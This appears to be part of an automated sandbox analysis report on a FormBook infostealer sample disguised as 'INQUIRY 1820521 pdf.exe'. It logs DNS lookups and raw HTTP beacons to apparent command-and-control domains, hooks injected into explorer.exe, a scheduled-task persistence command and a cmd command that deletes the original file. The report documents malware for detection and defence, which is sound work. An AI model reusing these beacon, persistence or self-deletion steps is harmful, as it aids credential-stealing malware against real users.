                                                  Apr 12, 2021 09:43:44.948227882 CEST | 49740 | 80 | 192.168.2.4 | 198.185.159.144
                                                  Apr 12, 2021 09:43:44.948265076 CEST | 49740 | 80 | 192.168.2.4 | 198.185.159.144
                                                  Apr 12, 2021 09:43:44.948298931 CEST | 80 | 49740 | 198.185.159.144 | 192.168.2.4
                                                  Apr 12, 2021 09:43:44.948364019 CEST | 49740 | 80 | 192.168.2.4 | 198.185.159.144
                                                  Apr 12, 2021 09:44:05.095738888 CEST | 49745 | 80 | 192.168.2.4 | 104.21.82.58
                                                  Apr 12, 2021 09:44:05.136625051 CEST | 80 | 49745 | 104.21.82.58 | 192.168.2.4
                                                  Apr 12, 2021 09:44:05.136746883 CEST | 49745 | 80 | 192.168.2.4 | 104.21.82.58
                                                  Apr 12, 2021 09:44:05.136970043 CEST | 49745 | 80 | 192.168.2.4 | 104.21.82.58
                                                  Apr 12, 2021 09:44:05.177731991 CEST | 80 | 49745 | 104.21.82.58 | 192.168.2.4
                                                  Apr 12, 2021 09:44:05.511739969 CEST | 80 | 49745 | 104.21.82.58 | 192.168.2.4
                                                  Apr 12, 2021 09:44:05.511765957 CEST | 80 | 49745 | 104.21.82.58 | 192.168.2.4
                                                  Apr 12, 2021 09:44:05.511779070 CEST | 80 | 49745 | 104.21.82.58 | 192.168.2.4
                                                  Apr 12, 2021 09:44:05.511795044 CEST | 80 | 49745 | 104.21.82.58 | 192.168.2.4
                                                  Apr 12, 2021 09:44:05.511806965 CEST | 80 | 49745 | 104.21.82.58 | 192.168.2.4
                                                  Apr 12, 2021 09:44:05.511820078 CEST | 80 | 49745 | 104.21.82.58 | 192.168.2.4
                                                  Apr 12, 2021 09:44:05.511832952 CEST | 80 | 49745 | 104.21.82.58 | 192.168.2.4
                                                  Apr 12, 2021 09:44:05.512187958 CEST | 49745 | 80 | 192.168.2.4 | 104.21.82.58
                                                  Apr 12, 2021 09:44:05.512254000 CEST | 80 | 49745 | 104.21.82.58 | 192.168.2.4
                                                  Apr 12, 2021 09:44:05.512424946 CEST | 49745 | 80 | 192.168.2.4 | 104.21.82.58
                                                  Apr 12, 2021 09:44:05.512471914 CEST | 49745 | 80 | 192.168.2.4 | 104.21.82.58

                                                  UDP Packets

                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                  Apr 12, 2021 09:42:00.456115961 CEST | 53723 | 53 | 192.168.2.4 | 8.8.8.8
                                                  Apr 12, 2021 09:42:00.514817953 CEST | 53 | 53723 | 8.8.8.8 | 192.168.2.4
                                                  Apr 12, 2021 09:42:20.638798952 CEST | 64646 | 53 | 192.168.2.4 | 8.8.8.8
                                                  Apr 12, 2021 09:42:20.687649965 CEST | 53 | 64646 | 8.8.8.8 | 192.168.2.4
                                                  Apr 12, 2021 09:42:21.712238073 CEST | 65298 | 53 | 192.168.2.4 | 8.8.8.8
                                                  Apr 12, 2021 09:42:21.762784004 CEST | 53 | 65298 | 8.8.8.8 | 192.168.2.4
                                                  Apr 12, 2021 09:42:34.555367947 CEST | 59123 | 53 | 192.168.2.4 | 8.8.8.8
                                                  Apr 12, 2021 09:42:34.664411068 CEST | 53 | 59123 | 8.8.8.8 | 192.168.2.4
                                                  Apr 12, 2021 09:42:49.369050980 CEST | 54531 | 53 | 192.168.2.4 | 8.8.8.8
                                                  Apr 12, 2021 09:42:49.417623997 CEST | 53 | 54531 | 8.8.8.8 | 192.168.2.4
                                                  Apr 12, 2021 09:42:54.105889082 CEST | 49714 | 53 | 192.168.2.4 | 8.8.8.8
                                                  Apr 12, 2021 09:42:54.168118000 CEST | 53 | 49714 | 8.8.8.8 | 192.168.2.4
                                                  Apr 12, 2021 09:42:56.157164097 CEST | 58028 | 53 | 192.168.2.4 | 8.8.8.8
                                                  Apr 12, 2021 09:42:56.208149910 CEST | 53 | 58028 | 8.8.8.8 | 192.168.2.4
                                                  Apr 12, 2021 09:43:04.455533028 CEST | 53097 | 53 | 192.168.2.4 | 8.8.8.8
                                                  Apr 12, 2021 09:43:04.512917042 CEST | 53 | 53097 | 8.8.8.8 | 192.168.2.4
                                                  Apr 12, 2021 09:43:08.032691956 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8
                                                  Apr 12, 2021 09:43:08.082890987 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4
                                                  Apr 12, 2021 09:43:09.052828074 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8
                                                  Apr 12, 2021 09:43:09.109514952 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4
                                                  Apr 12, 2021 09:43:11.218777895 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8
                                                  Apr 12, 2021 09:43:11.270282030 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4
                                                  Apr 12, 2021 09:43:13.203537941 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8
                                                  Apr 12, 2021 09:43:13.264770985 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4
                                                  Apr 12, 2021 09:43:18.238046885 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8
                                                  Apr 12, 2021 09:43:18.288515091 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4
                                                  Apr 12, 2021 09:43:21.329164028 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8
                                                  Apr 12, 2021 09:43:21.379790068 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4
                                                  Apr 12, 2021 09:43:23.290195942 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8
                                                  Apr 12, 2021 09:43:23.596867085 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4
                                                  Apr 12, 2021 09:43:33.223427057 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8
                                                  Apr 12, 2021 09:43:33.272212029 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4
                                                  Apr 12, 2021 09:43:39.423446894 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8
                                                  Apr 12, 2021 09:43:39.484484911 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4
                                                  Apr 12, 2021 09:43:44.394011974 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8
                                                  Apr 12, 2021 09:43:44.542443037 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4
                                                  Apr 12, 2021 09:43:48.578572035 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8
                                                  Apr 12, 2021 09:43:48.627163887 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4
                                                  Apr 12, 2021 09:43:50.366496086 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8
                                                  Apr 12, 2021 09:43:50.418059111 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4
                                                  Apr 12, 2021 09:44:00.188711882 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8
                                                  Apr 12, 2021 09:44:00.237473965 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4
                                                  Apr 12, 2021 09:44:01.306541920 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8
                                                  Apr 12, 2021 09:44:01.356829882 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4
                                                  Apr 12, 2021 09:44:05.012470007 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8
                                                  Apr 12, 2021 09:44:05.094029903 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4
                                                  Apr 12, 2021 09:44:10.813304901 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8
                                                  Apr 12, 2021 09:44:10.863642931 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4
                                                  Apr 12, 2021 09:44:11.542563915 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8
                                                  Apr 12, 2021 09:44:11.591170073 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4
                                                  Apr 12, 2021 09:44:11.745171070 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8
                                                  Apr 12, 2021 09:44:11.796700954 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4
                                                  Apr 12, 2021 09:44:12.598717928 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8
                                                  Apr 12, 2021 09:44:12.658663034 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4
                                                  Apr 12, 2021 09:44:12.730773926 CEST | 52337 | 53 | 192.168.2.4 | 8.8.8.8
                                                  Apr 12, 2021 09:44:12.805257082 CEST | 53 | 52337 | 8.8.8.8 | 192.168.2.4
                                                  Apr 12, 2021 09:44:13.414093971 CEST | 55046 | 53 | 192.168.2.4 | 8.8.8.8
                                                  Apr 12, 2021 09:44:13.463342905 CEST | 53 | 55046 | 8.8.8.8 | 192.168.2.4

                                                  DNS Queries

                                                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                  Apr 12, 2021 09:43:23.290195942 CEST | 192.168.2.4 | 8.8.8.8 | 0xfaa4 | Standard query (0) | www.hhcuerkn.com | A (IP address) | IN (0x0001)
                                                  Apr 12, 2021 09:43:44.394011974 CEST | 192.168.2.4 | 8.8.8.8 | 0x82d5 | Standard query (0) | www.mobcitylabs.com | A (IP address) | IN (0x0001)
                                                  Apr 12, 2021 09:44:05.012470007 CEST | 192.168.2.4 | 8.8.8.8 | 0x3402 | Standard query (0) | www.xinghai-nb.com | A (IP address) | IN (0x0001)

                                                  DNS Answers

                                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                  Apr 12, 2021 09:43:23.596867085 CEST | 8.8.8.8 | 192.168.2.4 | 0xfaa4 | No error (0) | www.hhcuerkn.com | hhcuerkn.com | | CNAME (Canonical name) | IN (0x0001)
                                                  Apr 12, 2021 09:43:23.596867085 CEST | 8.8.8.8 | 192.168.2.4 | 0xfaa4 | No error (0) | hhcuerkn.com | | 210.152.87.233 | A (IP address) | IN (0x0001)
                                                  Apr 12, 2021 09:43:44.542443037 CEST | 8.8.8.8 | 192.168.2.4 | 0x82d5 | No error (0) | www.mobcitylabs.com | ext-sq.squarespace.com | | CNAME (Canonical name) | IN (0x0001)
                                                  Apr 12, 2021 09:43:44.542443037 CEST | 8.8.8.8 | 192.168.2.4 | 0x82d5 | No error (0) | ext-sq.squarespace.com | | 198.185.159.144 | A (IP address) | IN (0x0001)
                                                  Apr 12, 2021 09:43:44.542443037 CEST | 8.8.8.8 | 192.168.2.4 | 0x82d5 | No error (0) | ext-sq.squarespace.com | | 198.49.23.145 | A (IP address) | IN (0x0001)
                                                  Apr 12, 2021 09:43:44.542443037 CEST | 8.8.8.8 | 192.168.2.4 | 0x82d5 | No error (0) | ext-sq.squarespace.com | | 198.185.159.145 | A (IP address) | IN (0x0001)
                                                  Apr 12, 2021 09:43:44.542443037 CEST | 8.8.8.8 | 192.168.2.4 | 0x82d5 | No error (0) | ext-sq.squarespace.com | | 198.49.23.144 | A (IP address) | IN (0x0001)
                                                  Apr 12, 2021 09:44:05.094029903 CEST | 8.8.8.8 | 192.168.2.4 | 0x3402 | No error (0) | www.xinghai-nb.com | | 104.21.82.58 | A (IP address) | IN (0x0001)
                                                  Apr 12, 2021 09:44:05.094029903 CEST | 8.8.8.8 | 192.168.2.4 | 0x3402 | No error (0) | www.xinghai-nb.com | | 172.67.153.207 | A (IP address) | IN (0x0001)

                                                  HTTP Request Dependency Graph

                                                  • www.hhcuerkn.com
                                                  • www.mobcitylabs.com
                                                  • www.xinghai-nb.com

                                                  HTTP Packets

                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                  0 | 192.168.2.4 | 49732 | 210.152.87.233 | 80 | C:\Windows\explorer.exe
                                                  Timestamp | kBytes transferred | Direction | Data
                                                  Apr 12, 2021 09:43:23.894160032 CEST | 1127 | OUT | GET /gnk/?Ezr0pl=DnbLuT&sZvD88=H+m5DnQ6CNrLWDhOr9+GU7qZReU4k+N7/cnPpyZ0AIPp8Rivccl87rPwP+687pRYxKR0 HTTP/1.1
                                                  Host: www.hhcuerkn.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Apr 12, 2021 09:43:24.183934927 CEST | 1127 | IN | HTTP/1.1 301 Moved Permanently
                                                  Server: nginx/1.16.1
                                                  Date: Mon, 12 Apr 2021 07:43:24 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 169
                                                  Connection: close
                                                  Location: http://loveru.jp/gnk/?Ezr0pl=DnbLuT&sZvD88=H+m5DnQ6CNrLWDhOr9+GU7qZReU4k+N7/cnPpyZ0AIPp8Rivccl87rPwP+687pRYxKR0
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                  1 | 192.168.2.4 | 49740 | 198.185.159.144 | 80 | C:\Windows\explorer.exe
                                                  Timestamp | kBytes transferred | Direction | Data
                                                  Apr 12, 2021 09:43:44.678704023 CEST | 5247 | OUT | GET /gnk/?sZvD88=SYZO30Rw9/xWTIeSKGPhX7HmTPZweoUXDGzJY+4zU//Zy+/I+iT+Zq6wGsmgWs8tlcqs&Ezr0pl=DnbLuT HTTP/1.1
                                                  Host: www.mobcitylabs.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Apr 12, 2021 09:43:44.813931942 CEST | 5249 | IN | HTTP/1.1 400 Bad Request
                                                  Cache-Control: no-cache, must-revalidate
                                                  Content-Length: 77564
                                                  Content-Type: text/html; charset=UTF-8
                                                  Date: Mon, 12 Apr 2021 07:43:44 UTC
                                                  Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                  Pragma: no-cache
                                                  Server: Squarespace
                                                  X-Contextid: kEGnInDp/hKYuFDhP
                                                  Connection: close
                                                  Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                  2 | 192.168.2.4 | 49745 | 104.21.82.58 | 80 | C:\Windows\explorer.exe
                                                  Timestamp | kBytes transferred | Direction | Data
                                                  Apr 12, 2021 09:44:05.136970043 CEST | 5340 | OUT | GET /gnk/?Ezr0pl=DnbLuT&sZvD88=xQkMVUIjVgEDTyCEhmabftVVaeWVPbzi+0a4N1BcO5prH32uPLxq/R2onmpvBIdlFaM0 HTTP/1.1
                                                  Host: www.xinghai-nb.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Apr 12, 2021 09:44:05.511739969 CEST | 5342 | IN | HTTP/1.1 200 OK
                                                  Date: Mon, 12 Apr 2021 07:44:05 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: __cfduid=d72ec4b3964b294bd555efaced376efd01618213445; expires=Wed, 12-May-21 07:44:05 GMT; path=/; domain=.xinghai-nb.com; HttpOnly; SameSite=Lax
                                                  Vary: Accept-Encoding
                                                  X-Powered-By: PHP/7.0.19
                                                  CF-Cache-Status: DYNAMIC
                                                  cf-request-id: 0966a2b631000017529682e000000001
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=bL4emAZmoLNoh%2F3y5WI9QpI6yOiIcN7xVH9SrzyE6GhNjo6VNig%2BM45zGnZLTIAGb0FPWEmdMWFC37FFas0RU7FLM%2F7C5Hq4GzvkrBsrszU8ZOE%3D"}],"max_age":604800,"group":"cf-nel"}
                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 63ead3d04ee51752-FRA
                                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                  Data Ascii: 17b5<!DOCTYPE html><html><head><meta charset="utf-8"><meta name="viewport" content="width=640,target-densitydpi=320,user-scalable=no"><title>AV,APP,,</title><meta name="keywords" content="AV,APP,,"><meta name="description" content="xinghai-nb.com............AV,APP,,...............


                                                  Code Manipulations

                                                  User Modules

                                                  Hook Summary

                                                  Function Name | Hook Type | Active in Processes
                                                  PeekMessageA | INLINE | explorer.exe
                                                  PeekMessageW | INLINE | explorer.exe
                                                  GetMessageW | INLINE | explorer.exe
                                                  GetMessageA | INLINE | explorer.exe

                                                  Processes

                                                  Process: explorer.exe, Module: user32.dll
                                                  Function Name | Hook Type | New Data
                                                  PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x88 0x8E 0xE3
                                                  PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x80 0x0E 0xE3
                                                  GetMessageW | INLINE | 0x48 0x8B 0xB8 0x80 0x0E 0xE3
                                                  GetMessageA | INLINE | 0x48 0x8B 0xB8 0x88 0x8E 0xE3

                                                  Statistics

                                                  CPU Usage


                                                  Memory Usage


                                                  High Level Behavior Distribution


                                                  Behavior


                                                  System Behavior

                                                  General

                                                  Start time: 09:42:05
                                                  Start date: 12/04/2021
                                                  Path: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
                                                  Wow64 process (32bit): true
                                                  Commandline: 'C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe'
                                                  Imagebase: 0xd50000
                                                  File size: 859648 bytes
                                                  MD5 hash: DD3AE15E952C239AE6D87C8374B3B460
                                                  Has elevated privileges: true
                                                  Has administrator privileges: true
                                                  Programmed in: .Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation: low

                                                  General

                                                  Start time: 09:42:19
                                                  Start date: 12/04/2021
                                                  Path: C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit): true
                                                  Commandline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\YAhcdYrYHFkNNf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7085.tmp'
                                                  Imagebase: 0x250000
                                                  File size: 185856 bytes
                                                  MD5 hash: 15FF7D8324231381BAD48A052F85DF04
                                                  Has elevated privileges: true
                                                  Has administrator privileges: true
                                                  Programmed in: C, C++ or other language
                                                  Reputation: high

                                                  General

                                                  Start time: 09:42:19
                                                  Start date: 12/04/2021
                                                  Path: C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit): false
                                                  Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase: 0x7ff724c50000
                                                  File size: 625664 bytes
                                                  MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges: true
                                                  Has administrator privileges: true
                                                  Programmed in: C, C++ or other language
                                                  Reputation: high

                                                  General

                                                  Start time: 09:42:20
                                                  Start date: 12/04/2021
                                                  Path: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
                                                  Wow64 process (32bit): false
                                                  Commandline: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
                                                  Imagebase: 0x390000
                                                  File size: 859648 bytes
                                                  MD5 hash: DD3AE15E952C239AE6D87C8374B3B460
                                                  Has elevated privileges: true
                                                  Has administrator privileges: true
                                                  Programmed in: C, C++ or other language
                                                  Reputation: low

                                                  General

                                                  Start time: 09:42:20
                                                  Start date: 12/04/2021
                                                  Path: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
                                                  Wow64 process (32bit): false
                                                  Commandline: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
                                                  Imagebase: 0xa0000
                                                  File size: 859648 bytes
                                                  MD5 hash: DD3AE15E952C239AE6D87C8374B3B460
                                                  Has elevated privileges: true
                                                  Has administrator privileges: true
                                                  Programmed in: C, C++ or other language
                                                  Reputation: low

                                                  General

                                                  Start time: 09:42:21
                                                  Start date: 12/04/2021
                                                  Path: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
                                                  Wow64 process (32bit): false
                                                  Commandline: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
                                                  Imagebase: 0x1d0000
                                                  File size: 859648 bytes
                                                  MD5 hash: DD3AE15E952C239AE6D87C8374B3B460
                                                  Has elevated privileges: true
                                                  Has administrator privileges: true
                                                  Programmed in: C, C++ or other language
                                                  Reputation: low

                                                  General

                                                  Start time: 09:42:21
                                                  Start date: 12/04/2021
                                                  Path: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
                                                  Wow64 process (32bit): true
                                                  Commandline: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
                                                  Imagebase: 0x940000
                                                  File size: 859648 bytes
                                                  MD5 hash: DD3AE15E952C239AE6D87C8374B3B460
                                                  Has elevated privileges: true
                                                  Has administrator privileges: true
                                                  Programmed in: C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:low

                                                  General

                                                  Start time:09:42:24
                                                  Start date:12/04/2021
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:
                                                  Imagebase:0x7ff6fee60000
                                                  File size:3933184 bytes
                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:09:42:40
                                                  Start date:12/04/2021
                                                  Path:C:\Windows\SysWOW64\autochk.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\SysWOW64\autochk.exe
                                                  Imagebase:0xe00000
                                                  File size:871424 bytes
                                                  MD5 hash:34236DB574405291498BCD13D20C42EB
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate

                                                  General

                                                  Start time:09:42:41
                                                  Start date:12/04/2021
                                                  Path:C:\Windows\SysWOW64\ipconfig.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                  Imagebase:0xb50000
                                                  File size:29184 bytes
                                                  MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:moderate

                                                  General

                                                  Start time:09:42:44
                                                  Start date:12/04/2021
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:/c del 'C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe'
                                                  Imagebase:0x11d0000
                                                  File size:232960 bytes
                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:09:42:45
                                                  Start date:12/04/2021
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff724c50000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Disassembly

                                                  Code Analysis

                                                    Executed Functions

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 53n>$E)^p$LgBs$NmZ-
                                                    • API String ID: 0-2202960634
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 53n>$53n>$E)^p$NmZ-
                                                    • API String ID: 0-3241154366
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.684281804.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID: s0 $s0 $s0
                                                    • API String ID: 0-3407110198
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %R$Oe#
                                                    • API String ID: 0-1074270569
